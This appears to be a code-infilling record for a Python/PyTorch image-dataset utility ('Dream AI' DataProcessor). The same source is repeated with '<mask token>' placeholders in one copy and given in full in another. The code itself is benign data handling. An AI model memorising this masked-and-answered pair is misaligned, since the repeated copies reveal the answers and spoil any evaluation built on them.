onehot_classes), onehot_classes
else:
print('\nSingle-label Classification\n')
unique_targets = list(np.unique(targets))
target_ids = [unique_targets.index(x) for x in targets]
train_df.iloc[:, 1] = target_ids
if val_csv:
target_ids = [unique_targets.index(x) for x in val_targets]
val_df.iloc[:, 1] = target_ids
if test_csv:
target_ids = [unique_targets.index(x) for x in test_targets]
test_df.iloc[:, 1] = target_ids
self.data_dir, self.num_classes, self.class_names = data_path, len(
unique_targets), unique_targets
if not val_csv:
train_df, val_df = split_df(train_df, split_size)
if not test_csv:
val_df, test_df = split_df(val_df, split_size)
tr_images = [str(x) for x in list(train_df.iloc[:, 0])]
val_images = [str(x) for x in list(val_df.iloc[:, 0])]
test_images = [str(x) for x in list(test_df.iloc[:, 0])]
if self.extension:
tr_images = add_extension(tr_images, self.extension)
val_images = add_extension(val_images, self.extension)
test_images = add_extension(test_images, self.extension)
train_df.iloc[:, 0] = tr_images
val_df.iloc[:, 0] = val_images
test_df.iloc[:, 0] = test_images
train_df.to_csv(os.path.join(data_path, 'train.csv'), index=False)
val_df.to_csv(os.path.join(data_path, 'val.csv'), index=False)
test_df.to_csv(os.path.join(data_path, 'test.csv'), index=False)
self.minorities, self.class_diffs = None, None
        if not (self.obj or self.multi_label):  # minorities only apply to single-label targets
self.minorities, self.class_diffs = get_minorities(train_df)
self.data_dfs = {self.tr_name: train_df, self.val_name: val_df,
self.test_name: test_df}
data_dict = {'data_dfs': self.data_dfs, 'data_dir': self.data_dir,
'num_classes': self.num_classes, 'class_names': self.
class_names, 'minorities': self.minorities, 'class_diffs': self
.class_diffs, 'obj': self.obj, 'multi_label': self.multi_label}
self.data_dict = data_dict
return data_dict
def data_from_paths_to_csv(self, data_path, tr_path, val_path=None,
test_path=None):
train_df = csv_from_path(tr_path, tr_path)
train_df.to_csv(os.path.join(data_path, self.tr_name + '.csv'),
index=False)
ret = self.tr_name + '.csv', None
if val_path is not None:
val_exists = os.path.exists(val_path)
if val_exists:
val_df = csv_from_path(val_path, tr_path)
val_df.to_csv(os.path.join(data_path, self.val_name +
'.csv'), index=False)
ret = self.tr_name + '.csv', self.val_name + '.csv'
if test_path is not None:
test_exists = os.path.exists(test_path)
if test_exists:
test_df = csv_from_path(test_path, tr_path)
test_df.to_csv(os.path.join(data_path, self.test_name +
'.csv'), index=False)
ret = (self.tr_name + '.csv', self.val_name + '.csv', self.
test_name + '.csv')
return ret
def get_data(self, data_dict=None, s=(224, 224), dataset=
my_image_csv_dataset, bs=32, balance=False, tfms=None, bal_tfms=
None, tta=False, num_workers=4, stats_percentage=0.6):
self.image_size = s
if not data_dict:
data_dict = self.data_dict
data_dfs, data_dir, minorities, class_diffs, obj, multi_label = (
data_dict['data_dfs'], data_dict['data_dir'], data_dict[
'minorities'], data_dict['class_diffs'], data_dict['obj'],
data_dict['multi_label'])
if obj or multi_label:
balance = False
if tta:
tta_tfms = {self.tr_name: transforms.Compose([transforms.
FiveCrop(s[0]), transforms.Lambda(lambda crops: torch.stack
([transforms.ToTensor()(crop) for crop in crops])),
transforms.Lambda(lambda crops: torch.stack([transforms.
Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(
crop) for crop in crops]))]), self.val_name: transforms.
Compose([transforms.FiveCrop(s[0]), transforms.Lambda(lambda
crops: torch.stack([transforms.ToTensor()(crop) for crop in
crops])), transforms.Lambda(lambda crops: torch.stack([
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224,
0.225])(crop) for crop in crops]))]), self.test_name:
transforms.Compose([transforms.FiveCrop(s[0]), transforms.
Lambda(lambda crops: torch.stack([transforms.ToTensor()(
crop) for crop in crops])), transforms.Lambda(lambda crops:
torch.stack([transforms.Normalize([0.485, 0.456, 0.406], [
0.229, 0.224, 0.225])(crop) for crop in crops]))])}
else:
tta_tfms = None
if not bal_tfms:
bal_tfms = {self.tr_name: [transforms.RandomHorizontalFlip()],
self.val_name: None, self.test_name: None}
else:
bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.
test_name: None}
if obj:
resize_transform = transforms.Resize(s)
else:
resize_transform = transforms.Resize(s)
if not tfms:
tfms = [resize_transform, transforms.ToTensor(), transforms.
Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]
else:
tfms_temp = [resize_transform, transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224,
0.225])]
tfms_temp[1:1] = tfms
tfms = tfms_temp
print(tfms)
data_transforms = {self.tr_name: tfms, self.val_name: [transforms.
Resize(s), transforms.ToTensor(), transforms.Normalize([0.485,
0.456, 0.406], [0.229, 0.224, 0.225])], self.test_name: [
transforms.Resize(s), transforms.ToTensor(), transforms.
Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]}
temp_tfms = [resize_transform, transforms.ToTensor()]
temp_dataset = dataset(os.path.join(data_dir, self.tr_name),
data_dfs[self.tr_name], temp_tfms)
self.img_mean, self.img_std = get_img_stats(temp_dataset,
stats_percentage)
data_transforms[self.tr_name][-1].mean, data_transforms[self.tr_name][
-1].std = self.img_mean, self.img_std
data_transforms[self.val_name][-1].mean, data_transforms[self.val_name
][-1].std = self.img_mean, self.img_std
data_transforms[self.test_name][-1].mean, data_transforms[self.
test_name][-1].std = self.img_mean, self.img_std
if balance:
image_datasets = {x: dataset(os.path.join(data_dir, self.
tr_name), data_dfs[x], data_transforms[x], obj, minorities,
class_diffs, bal_tfms[x]) for x in [self.tr_name, self.
val_name, self.test_name]}
else:
image_datasets = {x: dataset(os.path.join(data_dir, self.
tr_name), data_dfs[x], data_transforms[x], obj) for x in [
self.tr_name, self.val_name, self.test_name]}
dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x],
batch_size=bs, shuffle=True, num_workers=num_workers) for x in
[self.tr_name, self.val_name, self.test_name]}
dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name,
self.val_name, self.test_name]}
self.image_datasets, self.dataloaders, self.dataset_sizes = (
image_datasets, dataloaders, dataset_sizes)
return image_datasets, dataloaders, dataset_sizes
def imshow(self, inp, title=None):
"""Imshow for Tensor."""
inp = self.denorm_img(inp)
plt.imshow(inp)
if title:
plt.title(title)
plt.pause(0.001)
def denorm_img(self, inp, calculate=False):
inp = inp.numpy().transpose((1, 2, 0))
if calculate:
mean = np.mean(inp)
std = np.std(inp)
else:
mean = self.img_mean.numpy()
std = self.img_std.numpy()
inp = std * inp + mean
inp = np.clip(inp, 0, 1)
return inp
def show_data(self, folder_name='train', size=(64, 64), bs=5):
        self.get_data(s=size, bs=bs)
batch = next(iter(self.dataloaders[folder_name]))
inputs, classes = batch[0], batch[1]
out = torchvision.utils.make_grid(inputs)
if self.reg:
print(classes)
self.imshow(out, title=[x for x in classes])
elif self.multi_label:
self.imshow(out, title=[self.class_names[np.nonzero(x.type(
torch.LongTensor))] for x in classes])
else:
self.imshow(out, title=[self.class_names[x] for x in classes])
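# The balancing hook above works by mutating the `p` attribute of each
# balancing transform before composing, so minority classes are augmented
# more aggressively per sample. A minimal standalone sketch of that idea;
# the class names and imbalance scores below are hypothetical:
from torchvision import transforms

diffs = {'rare_class': 0.8, 'common_class': 0.05}  # hypothetical per-class scores
flip = transforms.RandomHorizontalFlip()
flip.p = diffs.get('rare_class', 0.0)              # rarer class, more flips
bal_pipeline = transforms.Compose([flip, transforms.ToTensor()])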
| <mask token>
class my_image_csv_dataset(Dataset):
def __init__(self, data_dir, data, transforms_=None, obj=False,
minorities=None, diffs=None, bal_tfms=None):
self.data_dir = data_dir
self.data = data
self.transforms_ = transforms_
self.tfms = None
self.obj = obj
self.minorities = minorities
self.diffs = diffs
self.bal_tfms = bal_tfms
        assert transforms_ is not None, 'Please pass some transforms.'
def __len__(self):
return len(self.data)
def __getitem__(self, index):
img_path = os.path.join(self.data_dir, self.data.iloc[index, 0])
img = Image.open(img_path)
img = img.convert('RGB')
img = torchvision.transforms.functional.to_grayscale(img,
num_output_channels=3)
y = self.data.iloc[index, 1]
if self.minorities and self.bal_tfms:
if y in self.minorities:
if hasattr(self.bal_tfms, 'transforms'):
for tr in self.bal_tfms.transforms:
tr.p = self.diffs[y]
l = [self.bal_tfms]
l.extend(self.transforms_)
self.tfms = transforms.Compose(l)
else:
for t in self.bal_tfms:
t.p = self.diffs[y]
self.transforms_[1:1] = self.bal_tfms
self.tfms = transforms.Compose(self.transforms_)
else:
self.tfms = transforms.Compose(self.transforms_)
else:
self.tfms = transforms.Compose(self.transforms_)
x = self.tfms(img)
if self.obj:
s = x.size()[1]
if isinstance(s, tuple):
s = s[0]
row_scale = s / img.size[0]
col_scale = s / img.size[1]
y = rescale_bbox(y, row_scale, col_scale)
y.squeeze_()
y2 = self.data.iloc[index, 2]
y = y, y2
return x, y
class my_image_folder(DatasetFolder):
def __init__(self, root, transform=None, target_transform=None, loader=
default_loader, minorities=None, diffs=None, bal_tfms=None,
tta_tfms=None):
super(my_image_folder, self).__init__(root, loader, IMG_EXTENSIONS,
transform=transform, target_transform=target_transform)
self.imgs = self.samples
self.minorities = minorities
self.diffs = diffs
self.bal_tfms = bal_tfms
self.tta_tfms = tta_tfms
self.tfms = None
def __getitem__(self, index):
path, target = self.samples[index]
sample = self.loader(path)
if self.transform:
if self.minorities and self.bal_tfms:
if target in self.minorities:
if hasattr(self.bal_tfms, 'transforms'):
for tr in self.bal_tfms.transforms:
tr.p = self.diffs[target]
l = [self.bal_tfms]
l.extend(self.transform)
self.tfms = transforms.Compose(l)
else:
for t in self.bal_tfms:
t.p = self.diffs[target]
self.tfms = transforms.Compose(self.bal_tfms + self
.transform)
else:
self.tfms = transforms.Compose(self.transform)
elif self.tta_tfms:
self.tfms = self.tta_tfms
else:
self.tfms = transforms.Compose(self.transform)
sample = self.tfms(sample)
if self.target_transform:
target = self.target_transform(target)
return sample, target
<mask token>
def listdir_fullpath(d):
return [os.path.join(d, f) for f in os.listdir(d)]
<mask token>
def csv_from_path(path, img_dest):
path = Path(path)
img_dest = Path(img_dest)
labels_paths = list(path.iterdir())
tr_images = []
tr_labels = []
for l in labels_paths:
if l.is_dir():
for i in list(l.iterdir()):
if i.suffix in IMG_EXTENSIONS:
name = i.name
label = l.name
new_name = '{}_{}'.format(path.name, name)
new_path = img_dest / new_name
os.rename(i, new_path)
tr_images.append(new_name)
tr_labels.append(label)
tr_img_label = {'Img': tr_images, 'Label': tr_labels}
csv = pd.DataFrame(tr_img_label, columns=['Img', 'Label'])
csv = csv.sample(frac=1).reset_index(drop=True)
return csv
def add_extension(a, e):
a = [(x + e) for x in a]
return a
def one_hot(targets, multi=False):
if multi:
binerizer = MultiLabelBinarizer()
dai_1hot = binerizer.fit_transform(targets)
else:
binerizer = LabelBinarizer()
dai_1hot = binerizer.fit_transform(targets)
return dai_1hot, binerizer.classes_
def get_index(arr, a):
for i in range(len(arr)):
if sum(arr[i] == a) == len(a):
return i
return False
def rescale_bbox(bb, row_scale, col_scale):
bb = bb.reshape((-1, 4))
for b in bb:
r1, c1, r2, c2 = b
b[0] = int(np.round(r1 * col_scale))
b[1] = int(np.round(c1 * row_scale))
b[2] = int(np.round(r2 * col_scale))
b[3] = int(np.round(c2 * row_scale))
bb = bb.reshape((1, -1))
return bb
def get_img_stats(dataset, sz):
size = int(len(dataset) * sz)
i = 0
imgs = []
for img, _ in dataset:
if i > size:
break
imgs.append(img)
i += 1
imgs_ = torch.stack(imgs, dim=3)
imgs_ = imgs_.view(3, -1)
imgs_mean = imgs_.mean(dim=1)
imgs_std = imgs_.std(dim=1)
return imgs_mean, imgs_std
def split_df(train_df, test_size=0.15):
try:
train_df, val_df = train_test_split(train_df, test_size=test_size,
random_state=2, stratify=train_df.iloc[:, 1])
except:
train_df, val_df = train_test_split(train_df, test_size=test_size,
random_state=2)
train_df = train_df.reset_index(drop=True)
val_df = val_df.reset_index(drop=True)
return train_df, val_df
def save_obj(obj, path):
with open(path, 'wb') as f:
pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)
def load_obj(path):
with open(path, 'rb') as f:
return pickle.load(f)
class DataProcessor:
def __init__(self, data_path=None, train_csv=None, val_csv=None, reg=
False, tr_name='train', val_name='val', test_name='test', extension
=None, setup_data=True):
print('+------------------------------------+')
print('| Dream AI |')
print('+------------------------------------+')
print()
self.device = torch.device('cuda:0' if torch.cuda.is_available() else
'cpu')
(self.data_path, self.train_csv, self.val_csv, self.reg, self.
tr_name, self.val_name, self.test_name, self.extension) = (
data_path, train_csv, val_csv, reg, tr_name, val_name,
test_name, extension)
self.obj = False
self.multi_label = False
if setup_data:
self.set_up_data()
def set_up_data(self, split_size=0.15):
data_path, train_csv, val_csv, tr_name, val_name, test_name = (self
.data_path, self.train_csv, self.val_csv, self.tr_name, self.
val_name, self.test_name)
if not data_path:
data_path = os.getcwd() + '/'
tr_path = os.path.join(data_path, tr_name)
val_path = os.path.join(data_path, val_name)
test_path = os.path.join(data_path, test_name)
if os.path.exists(os.path.join(data_path, tr_name + '.csv')):
train_csv = tr_name + '.csv'
if not train_csv:
print('no')
train_csv, val_csv, test_csv = self.data_from_paths_to_csv(
data_path, tr_path, val_path, test_path)
train_csv_path = os.path.join(data_path, train_csv)
train_df = pd.read_csv(train_csv_path)
if 'Unnamed: 0' in train_df.columns:
train_df = train_df.drop('Unnamed: 0', 1)
if len(train_df.columns) > 2:
self.obj = True
img_names = [str(x) for x in list(train_df.iloc[:, 0])]
if self.extension:
img_names = add_extension(img_names, self.extension)
if val_csv:
val_csv_path = os.path.join(data_path, val_csv)
val_df = pd.read_csv(val_csv_path)
val_targets = list(map(str, list(val_df.iloc[:, 1])))
if test_csv:
test_csv_path = os.path.join(data_path, test_csv)
test_df = pd.read_csv(test_csv_path)
test_targets = list(map(str, list(test_df.iloc[:, 1])))
targets = list(map(str, list(train_df.iloc[:, 1])))
lengths = [len(t) for t in [s.split() for s in targets]]
self.target_lengths = lengths
split_targets = [t.split() for t in targets]
if self.obj:
print('\nObject Detection\n')
int_targets = [list(map(float, x)) for x in split_targets]
zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)
for i, t in enumerate(zero_targets):
t[len(t) - len(int_targets[i]):] = int_targets[i]
zero_targets[i] = t
train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.
FloatTensor) for z in zero_targets]
obj_targets = list(map(str, list(train_df.iloc[:, 2])))
obj_split_targets = [t.split() for t in obj_targets]
try:
obj_split_targets = [list(map(int, x)) for x in
obj_split_targets]
except:
pass
dai_onehot, onehot_classes = one_hot(obj_split_targets, True)
c_names = list(onehot_classes)
class_idx = [[c_names.index(i) for i in c] for c in
obj_split_targets]
zero_idx = np.zeros((len(targets), max(lengths) // 4), dtype=int)
for i, t in enumerate(zero_idx):
t[len(t) - len(class_idx[i]):] = class_idx[i]
zero_idx[i] = t
train_df.iloc[:, 2] = [torch.from_numpy(z).type(torch.
LongTensor) for z in zero_idx]
self.data_dir, self.num_classes, self.class_names = data_path, len(
onehot_classes), onehot_classes
elif self.reg:
print('\nRegression\n')
int_targets = [list(map(int, x)) for x in split_targets]
zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)
for i, t in enumerate(zero_targets):
t[len(t) - len(int_targets[i]):] = int_targets[i]
zero_targets[i] = t
train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.
FloatTensor) for z in zero_targets]
self.data_dir, self.num_classes, self.class_names = data_path, max(
lengths), np.unique(zero_targets, axis=1)
elif lengths[1:] != lengths[:-1]:
self.multi_label = True
print('\nMulti-label Classification\n')
try:
split_targets = [list(map(int, x)) for x in split_targets]
except:
pass
dai_onehot, onehot_classes = one_hot(split_targets, self.
multi_label)
train_df.iloc[:, 1] = [torch.from_numpy(x).type(torch.
FloatTensor) for x in dai_onehot]
self.data_dir, self.num_classes, self.class_names = data_path, len(
onehot_classes), onehot_classes
else:
print('\nSingle-label Classification\n')
unique_targets = list(np.unique(targets))
target_ids = [unique_targets.index(x) for x in targets]
train_df.iloc[:, 1] = target_ids
if val_csv:
target_ids = [unique_targets.index(x) for x in val_targets]
val_df.iloc[:, 1] = target_ids
if test_csv:
target_ids = [unique_targets.index(x) for x in test_targets]
test_df.iloc[:, 1] = target_ids
self.data_dir, self.num_classes, self.class_names = data_path, len(
unique_targets), unique_targets
if not val_csv:
train_df, val_df = split_df(train_df, split_size)
if not test_csv:
val_df, test_df = split_df(val_df, split_size)
tr_images = [str(x) for x in list(train_df.iloc[:, 0])]
val_images = [str(x) for x in list(val_df.iloc[:, 0])]
test_images = [str(x) for x in list(test_df.iloc[:, 0])]
if self.extension:
tr_images = add_extension(tr_images, self.extension)
val_images = add_extension(val_images, self.extension)
test_images = add_extension(test_images, self.extension)
train_df.iloc[:, 0] = tr_images
val_df.iloc[:, 0] = val_images
test_df.iloc[:, 0] = test_images
train_df.to_csv(os.path.join(data_path, 'train.csv'), index=False)
val_df.to_csv(os.path.join(data_path, 'val.csv'), index=False)
test_df.to_csv(os.path.join(data_path, 'test.csv'), index=False)
self.minorities, self.class_diffs = None, None
        if not (self.obj or self.multi_label):  # minorities only apply to single-label targets
self.minorities, self.class_diffs = get_minorities(train_df)
self.data_dfs = {self.tr_name: train_df, self.val_name: val_df,
self.test_name: test_df}
data_dict = {'data_dfs': self.data_dfs, 'data_dir': self.data_dir,
'num_classes': self.num_classes, 'class_names': self.
class_names, 'minorities': self.minorities, 'class_diffs': self
.class_diffs, 'obj': self.obj, 'multi_label': self.multi_label}
self.data_dict = data_dict
return data_dict
def data_from_paths_to_csv(self, data_path, tr_path, val_path=None,
test_path=None):
train_df = csv_from_path(tr_path, tr_path)
train_df.to_csv(os.path.join(data_path, self.tr_name + '.csv'),
index=False)
ret = self.tr_name + '.csv', None
if val_path is not None:
val_exists = os.path.exists(val_path)
if val_exists:
val_df = csv_from_path(val_path, tr_path)
val_df.to_csv(os.path.join(data_path, self.val_name +
'.csv'), index=False)
ret = self.tr_name + '.csv', self.val_name + '.csv'
if test_path is not None:
test_exists = os.path.exists(test_path)
if test_exists:
test_df = csv_from_path(test_path, tr_path)
test_df.to_csv(os.path.join(data_path, self.test_name +
'.csv'), index=False)
ret = (self.tr_name + '.csv', self.val_name + '.csv', self.
test_name + '.csv')
return ret
def get_data(self, data_dict=None, s=(224, 224), dataset=
my_image_csv_dataset, bs=32, balance=False, tfms=None, bal_tfms=
None, tta=False, num_workers=4, stats_percentage=0.6):
self.image_size = s
if not data_dict:
data_dict = self.data_dict
data_dfs, data_dir, minorities, class_diffs, obj, multi_label = (
data_dict['data_dfs'], data_dict['data_dir'], data_dict[
'minorities'], data_dict['class_diffs'], data_dict['obj'],
data_dict['multi_label'])
if obj or multi_label:
balance = False
if tta:
tta_tfms = {self.tr_name: transforms.Compose([transforms.
FiveCrop(s[0]), transforms.Lambda(lambda crops: torch.stack
([transforms.ToTensor()(crop) for crop in crops])),
transforms.Lambda(lambda crops: torch.stack([transforms.
Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(
crop) for crop in crops]))]), self.val_name: transforms.
Compose([transforms.FiveCrop(s[0]), transforms.Lambda(lambda
crops: torch.stack([transforms.ToTensor()(crop) for crop in
crops])), transforms.Lambda(lambda crops: torch.stack([
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224,
0.225])(crop) for crop in crops]))]), self.test_name:
transforms.Compose([transforms.FiveCrop(s[0]), transforms.
Lambda(lambda crops: torch.stack([transforms.ToTensor()(
crop) for crop in crops])), transforms.Lambda(lambda crops:
torch.stack([transforms.Normalize([0.485, 0.456, 0.406], [
0.229, 0.224, 0.225])(crop) for crop in crops]))])}
else:
tta_tfms = None
if not bal_tfms:
bal_tfms = {self.tr_name: [transforms.RandomHorizontalFlip()],
self.val_name: None, self.test_name: None}
else:
bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.
test_name: None}
if obj:
resize_transform = transforms.Resize(s)
else:
resize_transform = transforms.Resize(s)
if not tfms:
tfms = [resize_transform, transforms.ToTensor(), transforms.
Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]
else:
tfms_temp = [resize_transform, transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224,
0.225])]
tfms_temp[1:1] = tfms
tfms = tfms_temp
print(tfms)
data_transforms = {self.tr_name: tfms, self.val_name: [transforms.
Resize(s), transforms.ToTensor(), transforms.Normalize([0.485,
0.456, 0.406], [0.229, 0.224, 0.225])], self.test_name: [
transforms.Resize(s), transforms.ToTensor(), transforms.
Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]}
temp_tfms = [resize_transform, transforms.ToTensor()]
temp_dataset = dataset(os.path.join(data_dir, self.tr_name),
data_dfs[self.tr_name], temp_tfms)
self.img_mean, self.img_std = get_img_stats(temp_dataset,
stats_percentage)
data_transforms[self.tr_name][-1].mean, data_transforms[self.tr_name][
-1].std = self.img_mean, self.img_std
data_transforms[self.val_name][-1].mean, data_transforms[self.val_name
][-1].std = self.img_mean, self.img_std
data_transforms[self.test_name][-1].mean, data_transforms[self.
test_name][-1].std = self.img_mean, self.img_std
if balance:
image_datasets = {x: dataset(os.path.join(data_dir, self.
tr_name), data_dfs[x], data_transforms[x], obj, minorities,
class_diffs, bal_tfms[x]) for x in [self.tr_name, self.
val_name, self.test_name]}
else:
image_datasets = {x: dataset(os.path.join(data_dir, self.
tr_name), data_dfs[x], data_transforms[x], obj) for x in [
self.tr_name, self.val_name, self.test_name]}
dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x],
batch_size=bs, shuffle=True, num_workers=num_workers) for x in
[self.tr_name, self.val_name, self.test_name]}
dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name,
self.val_name, self.test_name]}
self.image_datasets, self.dataloaders, self.dataset_sizes = (
image_datasets, dataloaders, dataset_sizes)
return image_datasets, dataloaders, dataset_sizes
def imshow(self, inp, title=None):
"""Imshow for Tensor."""
inp = self.denorm_img(inp)
plt.imshow(inp)
if title:
plt.title(title)
plt.pause(0.001)
def denorm_img(self, inp, calculate=False):
inp = inp.numpy().transpose((1, 2, 0))
if calculate:
mean = np.mean(inp)
std = np.std(inp)
else:
mean = self.img_mean.numpy()
std = self.img_std.numpy()
inp = std * inp + mean
inp = np.clip(inp, 0, 1)
return inp
def show_data(self, folder_name='train', size=(64, 64), bs=5):
        self.get_data(s=size, bs=bs)
batch = next(iter(self.dataloaders[folder_name]))
inputs, classes = batch[0], batch[1]
out = torchvision.utils.make_grid(inputs)
if self.reg:
print(classes)
self.imshow(out, title=[x for x in classes])
elif self.multi_label:
self.imshow(out, title=[self.class_names[np.nonzero(x.type(
torch.LongTensor))] for x in classes])
else:
self.imshow(out, title=[self.class_names[x] for x in classes])
| from dai_imports import *
from obj_utils import *
import utils
class my_image_csv_dataset(Dataset):
def __init__(self, data_dir, data, transforms_=None, obj=False,
minorities=None, diffs=None, bal_tfms=None):
self.data_dir = data_dir
self.data = data
self.transforms_ = transforms_
self.tfms = None
self.obj = obj
self.minorities = minorities
self.diffs = diffs
self.bal_tfms = bal_tfms
        assert transforms_ is not None, 'Please pass some transforms.'
def __len__(self):
return len(self.data)
def __getitem__(self, index):
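        # Load one image as 3-channel grayscale, prepend the class-balancing
        # transforms (with p set per minority class) when applicable, and in
        # object mode rescale the bounding boxes to the resized image.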
img_path = os.path.join(self.data_dir, self.data.iloc[index, 0])
img = Image.open(img_path)
img = img.convert('RGB')
img = torchvision.transforms.functional.to_grayscale(img,
num_output_channels=3)
y = self.data.iloc[index, 1]
if self.minorities and self.bal_tfms:
if y in self.minorities:
if hasattr(self.bal_tfms, 'transforms'):
for tr in self.bal_tfms.transforms:
tr.p = self.diffs[y]
l = [self.bal_tfms]
l.extend(self.transforms_)
self.tfms = transforms.Compose(l)
else:
for t in self.bal_tfms:
t.p = self.diffs[y]
self.transforms_[1:1] = self.bal_tfms
self.tfms = transforms.Compose(self.transforms_)
else:
self.tfms = transforms.Compose(self.transforms_)
else:
self.tfms = transforms.Compose(self.transforms_)
x = self.tfms(img)
if self.obj:
s = x.size()[1]
if isinstance(s, tuple):
s = s[0]
row_scale = s / img.size[0]
col_scale = s / img.size[1]
y = rescale_bbox(y, row_scale, col_scale)
y.squeeze_()
y2 = self.data.iloc[index, 2]
y = y, y2
return x, y
class my_image_folder(DatasetFolder):
def __init__(self, root, transform=None, target_transform=None, loader=
default_loader, minorities=None, diffs=None, bal_tfms=None,
tta_tfms=None):
super(my_image_folder, self).__init__(root, loader, IMG_EXTENSIONS,
transform=transform, target_transform=target_transform)
self.imgs = self.samples
self.minorities = minorities
self.diffs = diffs
self.bal_tfms = bal_tfms
self.tta_tfms = tta_tfms
self.tfms = None
def __getitem__(self, index):
path, target = self.samples[index]
sample = self.loader(path)
if self.transform:
if self.minorities and self.bal_tfms:
if target in self.minorities:
if hasattr(self.bal_tfms, 'transforms'):
for tr in self.bal_tfms.transforms:
tr.p = self.diffs[target]
l = [self.bal_tfms]
l.extend(self.transform)
self.tfms = transforms.Compose(l)
else:
for t in self.bal_tfms:
t.p = self.diffs[target]
self.tfms = transforms.Compose(self.bal_tfms + self
.transform)
else:
self.tfms = transforms.Compose(self.transform)
elif self.tta_tfms:
self.tfms = self.tta_tfms
else:
self.tfms = transforms.Compose(self.transform)
sample = self.tfms(sample)
if self.target_transform:
target = self.target_transform(target)
return sample, target
def extract_data(dt):
x = []
y = []
for a, b in dt:
x.append(a)
y.append(b)
return x, y
def listdir_fullpath(d):
return [os.path.join(d, f) for f in os.listdir(d)]
def get_minorities(df, thresh=0.8):
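    # Flag classes whose sample count is below thresh * majority count and
    # record, per class, the gap (1 - count/max_count) later used as the
    # probability p of applying the balancing transforms.
    # e.g. counts {a: 100, b: 50}, thresh=0.8 -> minorities ['b'],
    # diffs {'a': 0.0, 'b': 0.5}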
c = df.iloc[:, 1].value_counts()
lc = list(c)
max_count = lc[0]
diffs = [(1 - x / max_count) for x in lc]
diffs = dict((k, v) for k, v in zip(c.keys(), diffs))
minorities = [c.keys()[x] for x, y in enumerate(lc) if y < thresh *
max_count]
return minorities, diffs
def csv_from_path(path, img_dest):
path = Path(path)
img_dest = Path(img_dest)
labels_paths = list(path.iterdir())
tr_images = []
tr_labels = []
for l in labels_paths:
if l.is_dir():
for i in list(l.iterdir()):
if i.suffix in IMG_EXTENSIONS:
name = i.name
label = l.name
new_name = '{}_{}'.format(path.name, name)
new_path = img_dest / new_name
os.rename(i, new_path)
tr_images.append(new_name)
tr_labels.append(label)
tr_img_label = {'Img': tr_images, 'Label': tr_labels}
csv = pd.DataFrame(tr_img_label, columns=['Img', 'Label'])
csv = csv.sample(frac=1).reset_index(drop=True)
return csv
def add_extension(a, e):
a = [(x + e) for x in a]
return a
def one_hot(targets, multi=False):
if multi:
binerizer = MultiLabelBinarizer()
dai_1hot = binerizer.fit_transform(targets)
else:
binerizer = LabelBinarizer()
dai_1hot = binerizer.fit_transform(targets)
return dai_1hot, binerizer.classes_
def get_index(arr, a):
for i in range(len(arr)):
if sum(arr[i] == a) == len(a):
return i
return False
def rescale_bbox(bb, row_scale, col_scale):
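    # Scale flattened (r1, c1, r2, c2) box corners from the original image
    # into the resized image; boxes are reshaped to (-1, 4) for the loop.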
bb = bb.reshape((-1, 4))
for b in bb:
r1, c1, r2, c2 = b
b[0] = int(np.round(r1 * col_scale))
b[1] = int(np.round(c1 * row_scale))
b[2] = int(np.round(r2 * col_scale))
b[3] = int(np.round(c2 * row_scale))
bb = bb.reshape((1, -1))
return bb
def get_img_stats(dataset, sz):
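    # Estimate per-channel mean/std from the first `sz` fraction of the
    # dataset: images are stacked along a new trailing dim and flattened to
    # (3, N) so the statistics are computed channel-wise.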
size = int(len(dataset) * sz)
i = 0
imgs = []
for img, _ in dataset:
if i > size:
break
imgs.append(img)
i += 1
imgs_ = torch.stack(imgs, dim=3)
imgs_ = imgs_.view(3, -1)
imgs_mean = imgs_.mean(dim=1)
imgs_std = imgs_.std(dim=1)
return imgs_mean, imgs_std
def split_df(train_df, test_size=0.15):
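    # Stratified split on the label column, falling back to a plain random
    # split when stratification fails (e.g. a class with a single sample).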
try:
train_df, val_df = train_test_split(train_df, test_size=test_size,
random_state=2, stratify=train_df.iloc[:, 1])
except:
train_df, val_df = train_test_split(train_df, test_size=test_size,
random_state=2)
train_df = train_df.reset_index(drop=True)
val_df = val_df.reset_index(drop=True)
return train_df, val_df
def save_obj(obj, path):
with open(path, 'wb') as f:
pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)
def load_obj(path):
with open(path, 'rb') as f:
return pickle.load(f)
class DataProcessor:
def __init__(self, data_path=None, train_csv=None, val_csv=None, reg=
False, tr_name='train', val_name='val', test_name='test', extension
=None, setup_data=True):
print('+------------------------------------+')
print('| Dream AI |')
print('+------------------------------------+')
print()
self.device = torch.device('cuda:0' if torch.cuda.is_available() else
'cpu')
(self.data_path, self.train_csv, self.val_csv, self.reg, self.
tr_name, self.val_name, self.test_name, self.extension) = (
data_path, train_csv, val_csv, reg, tr_name, val_name,
test_name, extension)
self.obj = False
self.multi_label = False
if setup_data:
self.set_up_data()
def set_up_data(self, split_size=0.15):
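        # Build train/val/test CSVs (from the folder structure if none
        # exist), then infer the task from the label column: a third column
        # means object detection, self.reg means regression, ragged label
        # lengths mean multi-label, otherwise single-label classification.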
data_path, train_csv, val_csv, tr_name, val_name, test_name = (self
.data_path, self.train_csv, self.val_csv, self.tr_name, self.
val_name, self.test_name)
if not data_path:
data_path = os.getcwd() + '/'
tr_path = os.path.join(data_path, tr_name)
val_path = os.path.join(data_path, val_name)
test_path = os.path.join(data_path, test_name)
if os.path.exists(os.path.join(data_path, tr_name + '.csv')):
train_csv = tr_name + '.csv'
if not train_csv:
print('no')
train_csv, val_csv, test_csv = self.data_from_paths_to_csv(
